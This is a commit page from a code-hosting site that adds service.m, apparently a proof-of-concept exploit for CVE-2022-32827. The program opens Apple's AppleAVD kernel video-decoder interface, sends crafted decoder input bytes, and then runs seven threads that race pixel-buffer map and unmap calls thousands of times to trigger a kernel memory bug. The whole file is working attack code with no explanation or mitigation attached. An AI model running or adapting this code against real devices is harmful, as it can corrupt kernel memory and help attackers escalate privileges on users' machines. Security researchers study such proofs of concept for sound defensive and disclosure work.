crash.software
Projects
Pull Requests
Issues
Builds
CVE-2022-32827
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY CVE-2022-32827 Commits fb9acaea
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    service.m
     1 +#include <stdio.h>
     2 +#include <stdlib.h>
     3 +#include <string.h>
     4 +#include <unistd.h>
     5 + 
     6 +#include <IOKit/IOKitLib.h>
     7 +#include <IOSurface/IOSurface.h>
     8 + 
     9 +#include <Foundation/Foundation.h>
     10 + 
     11 +#include <libkern/OSAtomic.h>
     12 + 
     13 +#include <mach/thread_act.h>
     14 + 
     15 +#include <pthread.h>
     16 + 
     17 +#include <mach/mach.h>
     18 +#include <mach/vm_map.h>
     19 +#include <sys/mman.h>
     20 + 
     21 +void pthread_func(void** msg);
     22 +unsigned int selector = 0;
     23 + 
     24 +uint64_t inputScalar[16];
     25 +size_t inputScalarCnt = 0;
     26 + 
     27 +uint8_t inputStruct[40960];
     28 +size_t inputStructCnt = 16;
     29 + 
     30 +uint64_t outputScalar[16] = {0};
     31 +uint32_t outputScalarCnt = 0;
     32 + 
     33 +char outputStruct[40960] = {0};
     34 +size_t outputStructCnt = 4;
     35 + 
     36 +void null_sub(){}
     37 + 
     38 +struct async_reference {
     39 + mach_port_t port;
     40 + void(*fptr)(void);
     41 + void* something;
     42 + };
     43 + 
     44 +int main(int argc, char** argv){
     45 + 
     46 + IOSurfaceRef r = IOSurfaceCreate(@{@"IOSurfaceAllocSize" : @(1024)});
     47 + 
     48 + kern_return_t err;
     49 + 
     50 + 
     51 + int** ptr= inputStruct;
     52 + ptr[0] = 0x77777777;
     53 + ptr[1] = rand();
     54 + ptr[2] = rand();
     55 + ptr[3] = rand();
     56 + 
     57 + 
     58 + CFMutableDictionaryRef matching = IOServiceMatching("AppleAVD");
     59 + if(!matching){
     60 + printf("unable to create service matching dictionary\n");
     61 + return 0;
     62 + }
     63 + 
     64 + io_iterator_t iterator;
     65 + err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
     66 + if (err != KERN_SUCCESS){
     67 + printf("no matches\n");
     68 + return 0;
     69 + }
     70 + 
     71 + io_service_t service = IOIteratorNext(iterator);
     72 + 
     73 + if (service == IO_OBJECT_NULL){
     74 + printf("unable to find service\n");
     75 + return 0;
     76 + }
     77 +
     78 +
     79 +
     80 + printf("got service: %x\n", service);
     81 + 
     82 + io_connect_t conn = MACH_PORT_NULL;
     83 +
     84 + int stype = 0x100 | 1 | 16;
     85 +
     86 + err = IOServiceOpen(service, mach_task_self(), stype, &conn);
     87 + if (err != KERN_SUCCESS){
     88 + printf("unable to get user client connection\n");
     89 + return 0;
     90 + }
     91 + 
     92 + printf("got userclient connection: %x\n", conn);
     93 + IONotificationPortRef npr = IONotificationPortCreate(kIOMasterPortDefault);
     94 + mach_port_t np = IONotificationPortGetMachPort(npr);
     95 +
     96 + struct async_reference ar = {0};
     97 + ar.port = npr;
     98 + ar.fptr = null_sub;
     99 + 
     100 + 
     101 + char* addr = IOSurfaceGetBaseAddress(r);
     102 + 
     103 + char nalu[] = { 0, 0, 0, 7, 0x68, 0xe8, 0x43, 0x82, 0xd2, 0xc8, 0xb0, 0, 0, 0, 32, 0x67, 0x64, 0x0, 0x33, 0xac, 0x72, 0x84, 0x40, 0x78, 0x2, 0x27, 0xe5, 0xc0, 0x44, 0x0, 0x0, 0x3, 0x0, 0x4, 0x0, 0x0, 0x3, 0x0, 0xf0, 0x3c, 0x60, 0xc6, 0x11, 0x80, 0x1, 0x0, 0x7};
     104 + 
     105 + for(int i = 0; i < sizeof(nalu); i++){
     106 + addr[i] = nalu[i];
     107 + }
     108 +
     109 +
     110 + IOConnectCallAsyncMethod( //setCallback
     111 + conn,
     112 + 8,
     113 + np,
     114 + 0,
     115 + 0,
     116 + inputScalar,
     117 + inputScalarCnt,
     118 + inputStruct,
     119 + inputStructCnt,
     120 + outputScalar,
     121 + &outputScalarCnt,
     122 + outputStruct,
     123 + &outputStructCnt);
     124 + 
     125 + 
     126 + char inp[] = {0x80, 0x07, 0x00, 0x00, 0xa0, 0x05, 0x00, 0x00, 0x4e, 0x00, 0x00, 0x04, 0x04, 0x00, 0x00, 0x00,
     127 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
     128 + 0xff, 0x01, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     129 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     130 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     131 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     132 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     133 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     134 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     135 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     136 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     137 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
     138 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x32, 0x00, 0x00, 0x00,
     139 + 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
     140 +
     141 + 
     142 + inp[0xb8] = IOSurfaceGetID(r);
     143 +
     144 + size_t out_num = 0x60;
     145 + 
     146 + IOConnectCallMethod( // createDecoder
     147 + conn,
     148 + 0,
     149 + inputScalar,
     150 + inputScalarCnt,
     151 + inp,
     152 + 0xd8,
     153 + outputScalar,
     154 + &outputScalarCnt,
     155 + outputStruct,
     156 + &out_num);
     157 + 
     158 + 
     159 + IOSurfaceRef r1 = IOSurfaceCreate(@{@"IOSurfaceAllocSize" : @(50000), @"IOSurfacePixelFormat" : @(0x61766331), @"IOSurfaceCacheMode" : @(1024) });
     160 + 
     161 + IOSurfaceSetValue(r1, @"IOSurfaceName", @"AVD video decoder RVRA");
     162 + 
     163 + char id = IOSurfaceGetID(r1);
     164 + 
     165 + int ids[16];
     166 + 
     167 + ids[0] = 128;
     168 + ids[1] = 0;
     169 + ids[2] = id;
     170 + 
     171 + 
     172 + void* ptrs[3];
     173 + 
     174 + ptrs[0] = conn;
     175 + ptrs[1] = id;
     176 + ptrs[2] = np;
     177 + 
     178 + 
     179 + int num_threads = 7;
     180 + pthread_t thread1[num_threads];
     181 + 
     182 + 
     183 + for(int i = 0; i < num_threads; i++){
     184 + pthread_create( &thread1[i], NULL, pthread_func, (void*) ptrs);
     185 + }
     186 + 
     187 + 
     188 + pthread_join( thread1[0], NULL);
     189 + 
     190 + // not reached
     191 + 
     192 + IOServiceClose(conn);
     193 + 
     194 + return 0;
     195 +}
     196 + 
     197 + 
     198 + 
     199 + 
     200 +void pthread_func(void** msg){
     201 + 
     202 + 
     203 + int ids[16];
     204 + 
     205 + ids[0] = 128;
     206 + ids[1] = 0;
     207 + ids[2] = (int)msg[1];
     208 + 
     209 + 
     210 + int ids1[16];
     211 + 
     212 + ids1[0] = (int)msg[1];
     213 + ids1[1] = 0;
     214 + 
     215 + for(int i = 0; i < 5000; i++){
     216 + 
     217 + IOConnectCallAsyncMethod( // mapPixelBuffer
     218 + msg[0],
     219 + 3,
     220 + msg[2],
     221 + 0,
     222 + 0,
     223 + inputScalar,
     224 + inputScalarCnt,
     225 + ids,
     226 + 16,
     227 + outputScalar,
     228 + &outputScalarCnt,
     229 + outputStruct,
     230 + &outputStructCnt);
     231 + 
     232 + 
     233 + 
     234 + IOConnectCallAsyncMethod(
     235 + msg[0],
     236 + 4,
     237 + msg[2],
     238 + 0,
     239 + 0,
     240 + inputScalar,
     241 + inputScalarCnt,
     242 + ids1,
     243 + 8,
     244 + outputScalar,
     245 + &outputScalarCnt,
     246 + outputStruct,
     247 + &outputStructCnt);
     248 + 
     249 + }
     250 +}
Please wait...
Page is in error, reload to recover